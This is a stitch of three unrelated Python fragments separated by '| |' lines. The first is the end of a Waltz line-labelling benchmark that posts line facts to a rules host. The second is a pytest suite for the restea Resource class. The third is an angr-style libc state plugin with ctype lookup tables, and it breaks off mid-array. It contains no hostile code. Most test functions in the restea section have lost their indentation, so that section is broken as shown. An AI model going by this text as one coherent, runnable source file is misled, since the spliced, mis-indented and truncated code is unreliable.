create_and_post(host, {'t':'line' ,'p1':590002 ,'p2':590003})
create_and_post(host, {'t':'line' ,'p1':590003 ,'p2':590005})
create_and_post(host, {'t':'line' ,'p1':590005 ,'p2':580004})
create_and_post(host, {'t':'line' ,'p1':590005 ,'p2':570005})
create_and_post(host, {'t':'line' ,'p1':570005 ,'p2':560005})
create_and_post(host, {'t':'line' ,'p1':560005 ,'p2':550005})
create_and_post(host, {'t':'line' ,'p1':550005 ,'p2':540004})
create_and_post(host, {'t':'line' ,'p1':480006 ,'p2':500006})
create_and_post(host, {'t':'line' ,'p1':500006 ,'p2':510006})
create_and_post(host, {'t':'line' ,'p1':510006 ,'p2':520006})
create_and_post(host, {'t':'line' ,'p1':480006 ,'p2':480008})
create_and_post(host, {'t':'line' ,'p1':480008 ,'p2':480009})
create_and_post(host, {'t':'line' ,'p1':480009 ,'p2':480010})
create_and_post(host, {'t':'line' ,'p1':480010 ,'p2':520010})
create_and_post(host, {'t':'line' ,'p1':520010 ,'p2':520006})
create_and_post(host, {'t':'line' ,'p1':520006 ,'p2':530007})
create_and_post(host, {'t':'line' ,'p1':530007 ,'p2':530008})
create_and_post(host, {'t':'line' ,'p1':530008 ,'p2':530009})
create_and_post(host, {'t':'line' ,'p1':530009 ,'p2':530011})
create_and_post(host, {'t':'line' ,'p1':530011 ,'p2':520010})
create_and_post(host, {'t':'line' ,'p1':530011 ,'p2':510011})
create_and_post(host, {'t':'line' ,'p1':510011 ,'p2':500011})
create_and_post(host, {'t':'line' ,'p1':500011 ,'p2':490011})
create_and_post(host, {'t':'line' ,'p1':490011 ,'p2':480010})
create_and_post(host, {'t':'line' ,'p1':540006 ,'p2':560006})
create_and_post(host, {'t':'line' ,'p1':560006 ,'p2':570006})
create_and_post(host, {'t':'line' ,'p1':570006 ,'p2':580006})
create_and_post(host, {'t':'line' ,'p1':540006 ,'p2':540008})
create_and_post(host, {'t':'line' ,'p1':540008 ,'p2':540009})
create_and_post(host, {'t':'line' ,'p1':540009 ,'p2':540010})
create_and_post(host, {'t':'line' ,'p1':540010 ,'p2':580010})
create_and_post(host, {'t':'line' ,'p1':580010 ,'p2':580006})
create_and_post(host, {'t':'line' ,'p1':580006 ,'p2':590007})
create_and_post(host, {'t':'line' ,'p1':590007 ,'p2':590008})
create_and_post(host, {'t':'line' ,'p1':590008 ,'p2':590009})
create_and_post(host, {'t':'line' ,'p1':590009 ,'p2':590011})
create_and_post(host, {'t':'line' ,'p1':590011 ,'p2':580010})
create_and_post(host, {'t':'line' ,'p1':590011 ,'p2':570011})
create_and_post(host, {'t':'line' ,'p1':570011 ,'p2':560011})
create_and_post(host, {'t':'line' ,'p1':560011 ,'p2':550011})
create_and_post(host, {'t':'line' ,'p1':550011 ,'p2':540010})
create_and_post(host, {'t':'line' ,'p1':470003 ,'p2':480003})
create_and_post(host, {'t':'line' ,'p1':450005 ,'p2':450006})
create_and_post(host, {'t':'line' ,'p1':500005 ,'p2':500006})
create_and_post(host, {'t':'line' ,'p1':470008 ,'p2':480008})
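# With the puzzle geometry posted, start the run: assert the initial stage
# fact and record the start time in the session state.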
host.assert_fact('waltzdb', {'t':'stage', 'l':'duplicate', 'sid': 1, 'id': 999})
host.patch_state('waltzdb', {'sid': 1, 'gid': 1000, 'start_time': unix_time_millis(datetime.datetime.now())})
run_all(['/tmp/redis0.sock'])
| |
import collections
import json
import mock
import pytest
from mock import patch
from restea import errors
from restea import formats
from restea import fields
from restea.resource import Resource
def create_resource_helper(
    method='GET',
    headers=None,
    data=None,
    formatter=None
):
    # `headers` defaults to None to avoid a shared mutable default argument.
    request = mock.Mock(method=method, headers=headers or {}, data=data)
    if not formatter:
        formatter = mock.Mock()
    return Resource(request, formatter), request, formatter
def test_init():
resource, req_mock, formatter_mock = create_resource_helper()
assert resource.request == req_mock
assert resource.formatter == formatter_mock
assert isinstance(resource.fields, fields.FieldSet)
def test_get_method_name_list():
resource, _, _ = create_resource_helper()
assert 'list' == resource._get_method_name(has_iden=False)
def test_get_method_name_show():
resource, _, _ = create_resource_helper()
assert 'show' == resource._get_method_name(has_iden=True)
def test_get_method_name_edit():
resource, _, _ = create_resource_helper(method='PUT')
assert 'edit' == resource._get_method_name(has_iden=True)
def test_get_method_name_edit_without_iden():
resource, _, _ = create_resource_helper(method='PUT')
with pytest.raises(errors.BadRequestError) as e:
resource._get_method_name(has_iden=False)
assert 'Given method requires iden' in str(e)
def test_get_method_name_create():
resource, _, _ = create_resource_helper(method='POST')
assert 'create' == resource._get_method_name(has_iden=False)
def test_get_method_name_create_with_id():
resource, _, _ = create_resource_helper(method='POST')
with pytest.raises(errors.BadRequestError) as e:
resource._get_method_name(has_iden=True)
assert "Given method shouldn't have iden" in str(e)
def test_get_method_name_delete():
resource, _, _ = create_resource_helper(method='DELETE')
assert 'delete' == resource._get_method_name(has_iden=True)
def test_get_method_name_unspecified_method():
resource, _, _ = create_resource_helper(method='HEAD')
with pytest.raises(errors.MethodNotAllowedError) as e:
resource._get_method_name(has_iden=True)
assert 'Method "HEAD" is not supported' in str(e)
def test_get_method_name_method_override():
headers = {'HTTP_X_HTTP_METHOD_OVERRIDE': 'PUT'}
resource, _, _ = create_resource_helper(method='HEAD', headers=headers)
assert 'edit' == resource._get_method_name(has_iden=True)
def test_iden_required_positive():
resource, _, _ = create_resource_helper()
assert resource._iden_required('show')
assert resource._iden_required('edit')
assert resource._iden_required('delete')
def test_iden_required_negative():
resource, _, _ = create_resource_helper()
assert resource._iden_required('create') is False
assert resource._iden_required('list') is False
def test_match_response_to_fields():
resource, _, _ = create_resource_helper()
resource.fields = mock.Mock(spec=fields.FieldSet)
resource.fields.field_names = ['name1', 'name2', 'name3']
data = {'name1': 1, 'name2': 2, 'name3': 3, 'name4': 4}
expected_data = {'name1': 1, 'name2': 2, 'name3': 3}
assert resource._match_response_to_fields(data) == expected_data
def test_match_response_list_to_fields():
resource, _, _ = create_resource_helper()
resource.fields = mock.Mock(spec=fields.FieldSet)
resource.fields.field_names = ['name1', 'name2', 'name3']
lst = [
{'name1': 1, 'name2': 2, 'name3': 3, 'name4': 4},
{'name1': 5, 'name2': 6},
]
expected_lst = [
{'name1': 1, 'name2': 2, 'name3': 3},
{'name1': 5, 'name2': 6},
]
assert list(resource._match_resource_list_to_fields(lst)) == expected_lst
def test_apply_decorators():
resource, _, _ = create_resource_helper()
resource.create = mock.MagicMock(return_value={
'test1': 0,
'test2': 0,
})
order = []
def dummy_decorator1(func):
def wrapper(*a, **kw):
order.append('dummy_decorator1')
res = func(*a, **kw)
res['test1'] = 'replacement #1'
return res
return wrapper
def dummy_decorator2(func):
def wrapper(*a, **kw):
order.append('dummy_decorator2')
res = func(*a, **kw)
res['test2'] = 'replacement #2'
return res
return wrapper
resource.decorators = [dummy_decorator1, dummy_decorator2]
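    # Expected behavior (asserted below): the wrappers execute in list
    # order, so dummy_decorator1's wrapper runs first.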
resource.create = resource._apply_decorators(resource.create)
expected_values = {'test1': 'replacement #1', 'test2': 'replacement #2'}
assert resource.create() == expected_values
assert order == ['dummy_decorator1', 'dummy_decorator2']
def test_is_valid_formatter_positive():
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
assert resource._is_valid_formatter
def test_is_valid_formatter_negative():
resource, _, _ = create_resource_helper(formatter=None)
assert resource._is_valid_formatter is False
def test_error_formatter_valid():
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
assert resource._error_formatter == formats.JsonFormat
def test_error_formatter_with_unknown_formatter():
resource, _, _ = create_resource_helper(formatter=None)
assert resource._error_formatter == formats.DEFAULT_FORMATTER
def test_get_method_valid():
resource, _, _ = create_resource_helper()
type(resource).create = mock.Mock(return_value={})
assert resource._get_method('create') == resource.create
def test_get_method_with_not_existing_method():
resource, _, _ = create_resource_helper()
with pytest.raises(errors.BadRequestError) as e:
        resource._get_method('not_existing_method')
assert 'Method "GET" is not implemented for a given endpoint' in str(e)
def test_get_payload_should_pass_validation():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
    formatter_mock.unserialize.return_value = {'data': 'should be overridden'}
expected_data = {'data': 'new value'}
resource.fields = mock.Mock()
resource.fields.validate.return_value = expected_data
assert resource._get_payload('edit') == expected_data
def test_get_payload_unexpected_data():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
formatter_mock.unserialize.side_effect = formats.LoadError()
with pytest.raises(errors.BadRequestError) as e:
resource._get_payload('edit')
assert 'Fail to load the data' in str(e)
def test_get_payload_not_mappable_payload():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
formatter_mock.unserialize.return_value = ['item']
with pytest.raises(errors.BadRequestError) as e:
resource._get_payload('edit')
assert 'Data should be key -> value structure' in str(e)
def test_get_payload_field_validation_fails():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
formatter_mock.unserialize.return_value = {'test': 'data'}
resource.fields = mock.Mock()
field_error_message = 'Invalid field value'
resource.fields.validate.side_effect = fields.FieldSet.Error(
field_error_message
)
with pytest.raises(errors.BadRequestError) as e:
resource._get_payload('edit')
assert field_error_message in str(e)
def test_get_payload_field_misconfigured_fields_fails():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
formatter_mock.unserialize.return_value = {'test': 'data'}
resource.fields = mock.Mock()
configuration_error_message = 'Improperly configured'
conf_error = fields.FieldSet.ConfigurationError(
configuration_error_message
)
resource.fields.validate.side_effect = conf_error
with pytest.raises(errors.ServerError) as e:
resource._get_payload('edit')
assert configuration_error_message in str(e)
def test_get_payload_field_validation_no_data_empty_payload():
resource, _, _ = create_resource_helper(method='POST')
assert {} == resource._get_payload('create')
def test_get_payload_validation_no_fields_case_empty_payload():
resource, _, formatter_mock = create_resource_helper(
method='PUT', data='data'
)
formatter_mock.unserialize.return_value = {'data': 'test'}
assert {} == resource._get_payload('edit')
@patch.object(formats.JsonFormat, 'serialize')
def test_process_valid(serialize_mock):
mocked_value = 'mocked_value'
serialize_mock.return_value = mocked_value
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
type(resource).show = mock.Mock(return_value={})
res = resource.process(iden=10)
assert res == mocked_value
@patch.object(formats.JsonFormat, 'serialize')
def test_process_valid_list(serialize_mock):
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
serialize_mock.return_value = '[]'
type(resource).list = mock.Mock(return_value=[])
res = resource.process()
assert res == '[]'
serialize_mock.return_value = '{}'
resource.show = mock.Mock(return_value={})
res = resource.process(iden=10)
assert res == '{}'
def test_process_wrong_formatter():
resource, _, _ = create_resource_helper(formatter=None)
resource.list = mock.MagicMock(return_value='')
with pytest.raises(errors.BadRequestError) as e:
resource.process()
assert 'Not recognizable format' in str(e)
@patch.object(formats.JsonFormat, 'serialize')
def test_process_method_raising_rest_error(serialize_mock):
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
type(resource).list = mock.Mock(side_effect=errors.RestError('test'))
with pytest.raises(errors.RestError) as e:
resource.process()
assert 'test' in str(e)
@patch.object(formats.JsonFormat, 'serialize')
def test_process_error_in_method_should_raise_server_error(serialize_mock):
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
type(resource).list = mock.MagicMock(
side_effect=ValueError('I will raise')
)
with pytest.raises(ValueError) as e:
resource.process()
assert 'I will raise' in str(e)
@patch.object(formats.JsonFormat, 'serialize')
def test_process_error_in_formatter_serialize_should_raise_server_error(
serialize_mock
):
resource, _, _ = create_resource_helper(formatter=formats.JsonFormat)
type(resource).list = mock.MagicMock(return_value='')
serialize_mock.side_effect = formats.LoadError()
with pytest.raises(errors.ServerError) as e:
resource.process()
assert "Service can't respond with this format" in str(e)
@patch.object(Resource, 'process')
def test_dispatch_valid(process_mock):
args = ('arg1', 'arg2')
kwargs = {'kw1': 'kw1', 'kw2': 'kw2'}
expected_result = json.dumps({'res': 'response from process'})
expected_content_type = 'content/type'
formatter_mock = mock.Mock(content_type=expected_content_type)
resource, _, _ = create_resource_helper(formatter=formatter_mock)
process_mock.return_value = expected_result
res, status, content_type, headers = resource.dispatch(*args, **kwargs)
resource.process.assert_called_with(*args, **kwargs)
assert res == expected_result
assert status == 200
assert content_type == expected_content_type
assert headers == {}
@patch.object(Resource, 'process')
def test_dispatch_exception(process_mock):
resource, _, _ = create_resource_helper()
resource.process.side_effect = errors.ServerError('Error!')
res, status, content_type, headers = resource.dispatch()
assert res == json.dumps({'error': 'Error!'})
assert status == 503
assert content_type == 'application/json'
assert headers == {}
resource.process.side_effect = errors.BadRequestError('Wrong!', code=101)
res, status, content_type, headers = resource.dispatch()
expected_response = {'error': 'Wrong!', 'code': 101}
assert set(json.loads(res).items()) == set(expected_response.items())
assert status == 400
assert content_type == 'application/json'
assert headers == {}
resource.process.side_effect = errors.ForbiddenError(
'Unauthorized!', login_path='/login'
)
res, status, content_type, headers = resource.dispatch()
expected_response = {'error': 'Unauthorized!', 'login_path': '/login'}
assert set(json.loads(res).items()) == set(expected_response.items())
assert status == 403
assert content_type == 'application/json'
assert headers == {}
resource.process.side_effect = errors.NotFoundError(
'Not found!', code=101, redirect_path='/search'
)
res, status, content_type, headers = resource.dispatch()
expected_response = {
'error': 'Not found!', 'code': 101, 'redirect_path': '/search'
}
assert set(json.loads(res).items()) == set(expected_response.items())
assert status == 404
assert content_type == 'application/json'
assert headers == {}
@patch.object(Resource, 'process')
def test_headers_with_success_response(process_mock):
expected_result = json.dumps({'res': 'response from process'})
expected_content_type = 'content/type'
formatter_mock = mock.Mock(content_type=expected_content_type)
resource, _, _ = create_resource_helper(formatter=formatter_mock)
process_mock.return_value = expected_result
resource.set_header('foo', 'bar')
resource.clear_header('baz')
res, status, content_type, headers = resource.dispatch()
resource.process.assert_called_with()
assert res == expected_result
assert status == 200
assert content_type == expected_content_type
assert headers == collections.OrderedDict([('foo', 'bar')])
@patch.object(Resource, 'process')
def test_headers_with_failed_response(process_mock):
resource, _, _ = create_resource_helper()
resource.process.side_effect = errors.ServerError('Error!')
resource.set_header('foo', 'bar')
resource.clear_header('baz')
res, status, content_type, headers = resource.dispatch()
assert res == json.dumps({'error': 'Error!'})
assert status == 503
assert content_type == 'application/json'
assert headers == collections.OrderedDict([('foo', 'bar')])
| |
from .plugin import SimStatePlugin
class SimStateLibc(SimStatePlugin):
"""
    This state plugin keeps track of libc-specific simulation state:
    symbolic string/buffer limits, strtok and strdup bookkeeping, the
    PPC64 ABI version, ctype locale table pointers, and the errno location.
"""
#__slots__ = [ 'heap_location', 'max_str_symbolic_bytes' ]
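    # Character-classification table in the layout of glibc's
    # __ctype_b_loc() table: one two-byte class-bitmask entry per character,
    # covering indices -128..255 (hence the table starts at 0x80 == -128).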
LOCALE_ARRAY = [
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x80
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x86
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x8c
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x92
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x98
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x9e
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xa4
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xaa
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xb0
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xb6
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xbc
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xc2
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xc8
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xce
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xd4
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xda
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xe0
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xe6
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xec
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xf2
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xf8
b"\000\000", b"\000\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", # 0xfe
b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\003\040", # 0x04
b"\002\040", b"\002\040", b"\002\040", b"\002\040", b"\002\000", b"\002\000", # 0x0a
b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", # 0x10
b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\002\000", # 0x16
b"\002\000", b"\002\000", b"\002\000", b"\002\000", b"\001\140", b"\004\300", # 0x1c
b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", # 0x22
b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", # 0x28
b"\004\300", b"\004\300", b"\010\330", b"\010\330", b"\010\330", b"\010\330", # 0x2e
b"\010\330", b"\010\330", b"\010\330", b"\010\330", b"\010\330", b"\010\330", # 0x34
b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", b"\004\300", # 0x3a
b"\004\300", b"\010\325", b"\010\325", b"\010\325", b"\010\325", b"\010\325", # 0x40
b"\010\325", b"\010\305", b"\010\305", b"\010\305", b"\010\305", b"\010\305", # 0x46
b"\010\305", b"\010\305", b"\010\305", b"\010\305", b"\010\305", b"\010\305", # 0x4c
b"\010\305", b"\010\305", b"\010\305", b"\010\305", b"\010\305", b"\010\305", # 0x52
b"\010\305", b"\010\305", b"\010\305", b"\004\300", b"\004\300", b"\004\300", # 0x58
b"\004\300", b"\004\300", b"\004\300", b"\010\326", b"\010\326", b"\010\326", # 0x5e
b"\010\326", b"\010\326", b"\010\326", b"\010\306", b"\010\306", b"\010\306", # 0x64
b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\010\306", # 0x6a
b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\010\306", # 0x70
b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\010\306", b"\004\300", # 0x76
b"\004\300", b"\004\300", b"\004\300", b"\002\000", b"\000\000", b"\000\000", # 0x7c
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x82
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x88
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x8e
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x94
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0x9a
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xa0
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xa6
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xac
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xb2
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xb8
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xbe
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xc4
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xca
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xd0
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xd6
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xdc
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xe2
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xe8
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xee
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xf4
b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", b"\000\000", # 0xfa
]
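    # tolower() translation table in the layout of glibc's
    # __ctype_tolower_loc(): indices -128..255, with 0xffffffff encoding
    # EOF (-1).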
TOLOWER_LOC_ARRAY = [
0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, # 0x80
0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x8d, 0x8e, 0x8f, # 0x88
0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, # 0x90
0x98, 0x99, 0x9a, 0x9b, 0x9c, 0x9d, 0x9e, 0x9f, # 0x98
0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, # 0xa0
0xa8, 0xa9, 0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf, # 0xa8
0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, # 0xb0
0xb8, 0xb9, 0xba, 0xbb, 0xbc, 0xbd, 0xbe, 0xbf, # 0xb8
0xc0, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, # 0xc0
0xc8, 0xc9, 0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf, # 0xc8
0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, # 0xd0
0xd8, 0xd9, 0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf, # 0xd8
0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, # 0xe0
0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 0xef, # 0xe8
0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, # 0xf0
0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xffffffff, # 0xf8
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, # 0x00
0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, # 0x08
0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, # 0x10
0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, # 0x18
0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, # 0x20
0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, # 0x28
0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, # 0x30
0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, # 0x38
0x40, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, # 0x40
0x68, 0x69, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, # 0x48
0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, # 0x50
0x78, 0x79, 0x7a, 0x5b, 0x5c, 0x5d, 0x5e, 0x5f, # 0x58
0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, # 0x60
0x68, 0x69, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, # 0x68
0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, # 0x70
0x78, 0x79, 0x7a, 0x7b, 0x7c, 0x7d, 0x7e, 0x7f, # 0x78
0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, # 0x80
0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x8d, 0x8e, 0x8f, # 0x88
0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, # 0x90
0x98, 0x99, 0x9a, 0x9b, 0x9c, 0x9d, 0x9e, 0x9f, # 0x98
0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, # 0xa0
0xa8, 0xa9, 0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf, # 0xa8
0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, # 0xb0
0xb8, 0xb9, 0xba, 0xbb, 0xbc, 0xbd, 0xbe, 0xbf, # 0xb8
0xc0, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, # 0xc0
0xc8, 0xc9, 0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf, # 0xc8
0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, # 0xd0
0xd8, 0xd9, 0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf, # 0xd8
0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, # 0xe0
0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 0xef, # 0xe8
0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, # 0xf0
0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xff, # 0xf8
]
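    # toupper() counterpart of the table above, same layout.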
    TOUPPER_LOC_ARRAY = [
0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, # 0x80
0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x8d, 0x8e, 0x8f, # 0x88
0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, # 0x90
0x98, 0x99, 0x9a, 0x9b, 0x9c, 0x9d, 0x9e, 0x9f, # 0x98
0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, # 0xa0
0xa8, 0xa9, 0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf, # 0xa8
0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, # 0xb0
0xb8, 0xb9, 0xba, 0xbb, 0xbc, 0xbd, 0xbe, 0xbf, # 0xb8
0xc0, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, # 0xc0
0xc8, 0xc9, 0xca, 0xcb, 0xcc, 0xcd, 0xce, 0xcf, # 0xc8
0xd0, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, 0xd7, # 0xd0
0xd8, 0xd9, 0xda, 0xdb, 0xdc, 0xdd, 0xde, 0xdf, # 0xd8
0xe0, 0xe1, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, 0xe7, # 0xe0
0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 0xef, # 0xe8
0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, # 0xf0
0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xffffffff, # 0xf8
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, # 0x00
0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, # 0x08
0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, # 0x10
0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, # 0x18
0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, # 0x20
0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, # 0x28
0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, # 0x30
0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f, # 0x38
0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, # 0x40
0x48, 0x49, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f, # 0x48
0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, # 0x50
0x58, 0x59, 0x5a, 0x5b, 0x5c, 0x5d, 0x5e, 0x5f, # 0x58
0x60, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, # 0x60
0x48, 0x49, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f, # 0x68
0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, # 0x70
0x58, 0x59, 0x5a, 0x7b, 0x7c, 0x7d, 0x7e, 0x7f, # 0x78
0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, # 0x80
0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x8d, 0x8e, 0x8f, # 0x88
0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, # 0x90
0x98, 0x99, 0x9a, 0x9b, 0x9c, 0x9d, 0x9e, 0x9f, # 0x98
0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, # 0xa0
0xa8, 0xa9, 0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf, # 0xa8
